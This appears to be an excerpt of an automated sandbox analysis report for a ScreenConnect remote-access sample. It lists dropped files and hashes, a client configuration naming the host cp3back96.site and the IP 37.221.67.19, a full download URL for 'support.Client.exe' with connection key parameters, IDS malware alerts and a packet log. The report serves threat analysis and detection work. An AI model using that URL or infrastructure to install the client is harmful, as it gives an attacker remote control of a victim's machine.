                                                                                                                                                                              SHA-512:58CC7741EBE1AADA93FD82A3E0A571A9A1AA3E400C46E7CDDDEF876D74F4FBBCBAE4293AC556B3823E8DC977E7CE72337A16C2D48EAB0AA52B736412AE43C634
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):266
                                                                                                                                                                              Entropy (8bit):4.842791478883622
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                              MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                              SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                              SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                              SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):87
                                                                                                                                                                              Entropy (8bit):3.463057265798253
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:/lqlhGXKRjgjkFmURueGvx2VTUz:4DRPAx2Kz
                                                                                                                                                                              MD5:D2DED43CE07BFCE4D1C101DFCAA178C8
                                                                                                                                                                              SHA1:CE928A1293EA2ACA1AC01B61A344857786AFE509
                                                                                                                                                                              SHA-256:8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
                                                                                                                                                                              SHA-512:A05486D523556C75FAAEEFE09BB2F8159A111B1B3560142E19048E6E3898A506EE4EA27DD6A4412EE56A7CE7C21E8152B1CDD92804BAF9FAC43973FABE006A2F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:......../...............................Microsoft Enhanced Cryptographic Provider v1.0.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 29 17:34:05 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2673
                                                                                                                                                                              Entropy (8bit):3.9897965635590027
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:8GdbTDnCHRidAKZdA1FehwiZUklqehwy+3:8uHETy
                                                                                                                                                                              MD5:2409E7A99E2BAE3287C0C318BDE3DF18
                                                                                                                                                                              SHA1:92091F74215BDFDD14BC3169AC70D0D85EAC469A
                                                                                                                                                                              SHA-256:9A764EAAC3ADBAC5E8F23549E1E5A7E24D8EB1E26E9762A8278D13999D6FDE22
                                                                                                                                                                              SHA-512:E6E3FE9D8FFA100A0E84BF583AFC0E4057A97EEEB3D3921EAB1A580E93D4B77AF3C8459FDD8CAA58860568701912C678A7897BC83220DDA7235B32F4964A55FF
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 29 17:34:05 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2675
                                                                                                                                                                              Entropy (8bit):4.0041280069380845
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:8HadbTDnCHRidAKZdA1seh/iZUkAQkqehDy+2:8HCH69QSy
                                                                                                                                                                              MD5:FB6BF3792F3CE635FAF851F71EADB75F
                                                                                                                                                                              SHA1:A0A6FAC574B6B7B5686613E872E29C9C43EB2AED
                                                                                                                                                                              SHA-256:39DC39DC90239DC1742AC936C40F3BC9281D29DD01E0FA88BC4195297367270C
                                                                                                                                                                              SHA-512:74EB764E78A41728D3D1DD9FC709FB66353A4F24DA2E4483D0AF8D29084A3B8A4E2C3E2DE45BDD6776B220E58EDB35467E054A7C75D93B6480BD8398C500CE6A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2689
                                                                                                                                                                              Entropy (8bit):4.0148359126549265
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:80dbTDnAHRidAKZdA14meh7sFiZUkmgqeh7sdy+BX:8oHYnXy
                                                                                                                                                                              MD5:5F920FB136C56B426B6BA0FDF8A40BF6
                                                                                                                                                                              SHA1:564F47DFE10BC65500AF1C38FED0E9F73FBF24D6
                                                                                                                                                                              SHA-256:D13797781FC00CD30C27ADAB52AF4749F3F7F41FD196F4572DF2158C153B60A4
                                                                                                                                                                              SHA-512:4CCC0433E3E8A96E0B0C2A6AC9FB70207AF3648F523E02551096C953E40933DDB86A7880BA38C7AFB24773DD4328C79E810D6C196AFA857116C7B3921CE973C4
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 29 17:34:05 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2677
                                                                                                                                                                              Entropy (8bit):4.0037178094955355
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:89dbTDnCHRidAKZdA1TehDiZUkwqehfy+R:8rHxFy
                                                                                                                                                                              MD5:829DADD0DB71EB46D498F4504AFEDFA8
                                                                                                                                                                              SHA1:A637A0285853F9C578DFAD3D464C9602DD66075A
                                                                                                                                                                              SHA-256:8F8835F6618CF98B481911B39E43F22640BF9E224248DE5D81F90ECD60A155FF
                                                                                                                                                                              SHA-512:F8C85CD3021BF5B73E38568863168B6158E1FBC4F1DEBF5E079CD2863DE3A98795C88AC34AEDE7984CA86107917DA982694383254936FF3D576493048680FD18
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 29 17:34:05 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2677
                                                                                                                                                                              Entropy (8bit):3.9912352848849784
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:8vdbTDnCHRidAKZdA1dehBiZUk1W1qehhy+C:8BHx9By
                                                                                                                                                                              MD5:BDFE77A925ED0708F9AB46E7658800F5
                                                                                                                                                                              SHA1:7084A89E3124CEBE526F51E0D9AD09C646B0A36F
                                                                                                                                                                              SHA-256:52DEA6A86CC9037714915DD44D8030731F9FF4B13D28C1FAFD98B8359DC9A5BE
                                                                                                                                                                              SHA-512:F71F85B825FC060DEB15C02FAC36E91A24B94D11ED092D06F7D5CB070596F9FCA758161EA2F13F013BFB0F76BD30D2DCD4188F3CDA023EC9529B5CD1BE8899E4
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 29 17:34:05 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2679
                                                                                                                                                                              Entropy (8bit):4.002420467200904
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:8qdbTDnCHRidAKZdA1duTeehOuTbbiZUk5OjqehOuTbXy+yT+:8yHZTfTbxWOvTbXy7T
                                                                                                                                                                              MD5:A149394FBD71F5AA7BD4FA56FCC00592
                                                                                                                                                                              SHA1:AAAF3C25614E78E5BD5EDEE8D16B63D871C0D2BF
                                                                                                                                                                              SHA-256:E6152F8527FF2BC2B1FAAE0F7A9873336A3F11313889856B39BEB30ED30A97C6
                                                                                                                                                                              SHA-512:73CF9317F808896386A8ED236144899711DC1952C8FABDB8AC969385B7C510379E15B3571CD8417116F569BC1EB49E23B67EE8D2DD9F9E20FB1F609F6F3E9668
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):86304
                                                                                                                                                                              Entropy (8bit):6.366539484726693
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:+azWlKzJVcNp++yQNS6xNNCT2l8NE8llbpTaCJRpsWr6cdaQTJSvYYS7Q8xe:yFNpo6rIKlUE8fbkqRfbaQlaYYSe
                                                                                                                                                                              MD5:7B959C1EA179AF2DFC447BF8DB1E2C26
                                                                                                                                                                              SHA1:96416735AE481583D2384E1C1D94F11AF6001384
                                                                                                                                                                              SHA-256:49E15A04657508140FF3409AE29947EA30BF19D98D1288CA62821F6851D278BD
                                                                                                                                                                              SHA-512:FD1EC47A24F11838258A4C0C51B5AB68BA64AB10052A5802E0B06BDF027258CEFA3173F74DFE89EED57F3C570284738A77AB5F1F45ACF552EF100F85C2DED1FA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):16056
                                                                                                                                                                              Entropy (8bit):6.421442638813114
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:+aWEWfbTJ+mj14zJc/8TUy6tQcyRY9IN02Hc+ZFv:+azWfvFZ4zJs0t8eY9uHc+ZV
                                                                                                                                                                              MD5:BF415D5D64E087797AA53817FA182680
                                                                                                                                                                              SHA1:BEDC87500001086F135F2D6F0F245039EEE757E2
                                                                                                                                                                              SHA-256:6CEFDE732BD60FD3568CDEF8C6272F5D7374EC095CE14A216906EEED873C9A38
                                                                                                                                                                              SHA-512:56F75596A87BC1AAEE6A8B59345DA82657B850A9D0E2C1E46F40838C4AC10D88F3D8864A788B0F404E406A2795F089A030683C04787E9FAFB7D486BDA4BF447C
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Ll..-...-...-..Q...-..Q..-..Q...-..eV...-..eV...-..eV...-...U...-...-...-..kV...-..kV...-..kV...-..Rich.-..................PE..L...9.wc...............!..........................@..........................P.......w....@.....................................<....0.................. 9...@......@...p...............................@...............D............................text...8........................... ..`.rdata...].......^..................@..@.data...............................@....rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):86304
                                                                                                                                                                              Entropy (8bit):6.366539484726693
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:+azWlKzJVcNp++yQNS6xNNCT2l8NE8llbpTaCJRpsWr6cdaQTJSvYYS7Q8xe:yFNpo6rIKlUE8fbkqRfbaQlaYYSe
                                                                                                                                                                              MD5:7B959C1EA179AF2DFC447BF8DB1E2C26
                                                                                                                                                                              SHA1:96416735AE481583D2384E1C1D94F11AF6001384
                                                                                                                                                                              SHA-256:49E15A04657508140FF3409AE29947EA30BF19D98D1288CA62821F6851D278BD
                                                                                                                                                                              SHA-512:FD1EC47A24F11838258A4C0C51B5AB68BA64AB10052A5802E0B06BDF027258CEFA3173F74DFE89EED57F3C570284738A77AB5F1F45ACF552EF100F85C2DED1FA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Ll..-...-...-..Q...-..Q..-..Q...-..eV...-..eV...-..eV...-...U...-...-...-..kV...-..kV...-..kV...-..Rich.-..................PE..L...9.wc...............!..........................@..........................P.......w....@.....................................<....0.................. 9...@......@...p...............................@...............D............................text...8........................... ..`.rdata...].......^..................@..@.data...............................@....rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):55
                                                                                                                                                                              Entropy (8bit):4.306461250274409
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                              Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                              Category:modified
                                                                                                                                                                              Size (bytes):4926
                                                                                                                                                                              Entropy (8bit):3.2464745947829505
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:FaqdF78F7B+AAHdKoqKFxcxkFiF7KaqdF73n8+AAHdKoqKFxcxkFdni:cEOB+AAsoJjykePEM+AAsoJjyki
                                                                                                                                                                              MD5:E395208173C239000FDD983148478397
                                                                                                                                                                              SHA1:112D4031B459AA222D59A93A20ACA352F6555750
                                                                                                                                                                              SHA-256:5FC9B394029F14F171F9A445C3AEF08C15850CE118DFC4722C739E7395DC5DD3
                                                                                                                                                                              SHA-512:7118BEC945CEF9A394C99ABE833B3DE6E9D778AFEC83218AE93C60AC346A5389A2A46AAEA51C589257576995E8190C048382F86E2DCE9A33058E51EB9FE6222E
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. O.c.t. .. 0.6. .. 2.0.2.3. .1.1.:.3.5.:.2.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .W.S.C. .S.t.a.t.e. .I.n.f.o. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):558
                                                                                                                                                                              Entropy (8bit):5.045566990880462
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENORB/vXbAa3xT:2dL9hK6E46YPtvH
                                                                                                                                                                              MD5:320927754A66AA3268EB87125434F3BB
                                                                                                                                                                              SHA1:E1D7F0CB7758B16E19BD5BD73789CD5A2A2DE85D
                                                                                                                                                                              SHA-256:7E159DD775A2FA46A78E8E79ED5E3E375EA07E7D5455695912C51AA086740F93
                                                                                                                                                                              SHA-512:7C468B3A99D568E17FE3FC148D716A6012DBAB8E9CDD24AB05DCE1B146C1C049D7797B50DE11796BDB628119D299F20AB334DE396F80F437CF4257CC15325217
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>cp3back96.site=37.221.67.19-29%2f10%2f2024%2018%3a35%3a22</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):86304
                                                                                                                                                                              Entropy (8bit):6.366539484726693
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:+azWlKzJVcNp++yQNS6xNNCT2l8NE8llbpTaCJRpsWr6cdaQTJSvYYS7Q8xe:yFNpo6rIKlUE8fbkqRfbaQlaYYSe
                                                                                                                                                                              MD5:7B959C1EA179AF2DFC447BF8DB1E2C26
                                                                                                                                                                              SHA1:96416735AE481583D2384E1C1D94F11AF6001384
                                                                                                                                                                              SHA-256:49E15A04657508140FF3409AE29947EA30BF19D98D1288CA62821F6851D278BD
                                                                                                                                                                              SHA-512:FD1EC47A24F11838258A4C0C51B5AB68BA64AB10052A5802E0B06BDF027258CEFA3173F74DFE89EED57F3C570284738A77AB5F1F45ACF552EF100F85C2DED1FA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              URL:https://cp9856.chelokipotlester.icu/Bin/support.Client.exe?h=cp3back96.site&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2F0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2FZuAUNQxVB6zV6MkV%2FQ3PQ8O4IKEUzM%2B1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2FCUtP6CZ%2F6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2B48fuhT%2FYi9ukTBmorR&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&i=Untitled%20Session&e=Support&y=Guest&r=
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Ll..-...-...-..Q...-..Q..-..Q...-..eV...-..eV...-..eV...-...U...-...-...-..kV...-..kV...-..kV...-..Rich.-..................PE..L...9.wc...............!..........................@..........................P.......w....@.....................................<....0.................. 9...@......@...p...............................@...............D............................text...8........................... ..`.rdata...].......^..................@..@.data...............................@....rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              No static file info
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-29T19:34:42.936256+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 37.221.67.19 | 443 | 192.168.2.16 | 49721 | TCP
2024-10-29T19:34:44.872378+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 37.221.67.19 | 443 | 192.168.2.16 | 49722 | TCP
2024-10-29T19:34:50.305537+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 37.221.67.19 | 443 | 192.168.2.16 | 49726 | TCP
2024-10-29T19:34:52.144780+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 37.221.67.19 | 443 | 192.168.2.16 | 49727 | TCP
2024-10-29T19:34:56.496926+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 37.221.67.19 | 443 | 192.168.2.16 | 49729 | TCP
2024-10-29T19:35:01.682027+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 37.221.67.19 | 443 | 192.168.2.16 | 49730 | TCP
2024-10-29T19:35:04.113926+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 37.221.67.19 | 443 | 192.168.2.16 | 49731 | TCP
2024-10-29T19:35:06.118919+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 37.221.67.19 | 443 | 192.168.2.16 | 49733 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                              Oct 29, 2024 19:34:06.222620964 CET49706443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:06.462739944 CET49673443192.168.2.16204.79.197.203
                                                                                                                                                                              Oct 29, 2024 19:34:06.528933048 CET4434970537.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:06.528968096 CET4434970537.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:06.528979063 CET4434970537.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:06.529002905 CET4434970537.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:06.529020071 CET4434970537.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:06.529031992 CET4434970537.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:06.529076099 CET49705443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:06.529098988 CET4434970537.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:06.529134989 CET49705443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:06.529155016 CET49705443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:06.797612906 CET4434970537.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:06.797631979 CET4434970537.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:06.797655106 CET4434970537.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:06.797717094 CET49705443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:06.797746897 CET4434970537.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:06.797763109 CET49705443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:06.797785997 CET49705443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:06.806766987 CET4434970537.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:06.806796074 CET4434970537.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:06.806871891 CET49705443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:06.806880951 CET4434970537.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:06.806926966 CET49705443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:06.920886993 CET4434970537.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:06.920921087 CET4434970537.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:06.921013117 CET49705443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:06.921037912 CET4434970537.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:06.921061039 CET49705443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:06.921073914 CET49705443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:07.036473036 CET4434970537.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:07.036511898 CET4434970537.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:07.036639929 CET49705443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:07.036665916 CET4434970537.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:07.036710024 CET49705443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:07.041189909 CET4434970537.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:07.041297913 CET49705443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:07.041304111 CET4434970537.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:07.041336060 CET4434970537.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:07.041383028 CET49705443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:07.041555882 CET49705443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:07.041569948 CET4434970537.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:07.064626932 CET49673443192.168.2.16204.79.197.203
                                                                                                                                                                              Oct 29, 2024 19:34:08.272656918 CET49673443192.168.2.16204.79.197.203
                                                                                                                                                                              Oct 29, 2024 19:34:08.823831081 CET49710443192.168.2.16142.250.185.228
                                                                                                                                                                              Oct 29, 2024 19:34:08.823879957 CET44349710142.250.185.228192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:08.823950052 CET49710443192.168.2.16142.250.185.228
                                                                                                                                                                              Oct 29, 2024 19:34:08.824173927 CET49710443192.168.2.16142.250.185.228
                                                                                                                                                                              Oct 29, 2024 19:34:08.824187040 CET44349710142.250.185.228192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:09.679733038 CET44349710142.250.185.228192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:09.680094957 CET49710443192.168.2.16142.250.185.228
                                                                                                                                                                              Oct 29, 2024 19:34:09.680126905 CET44349710142.250.185.228192.168.2.16
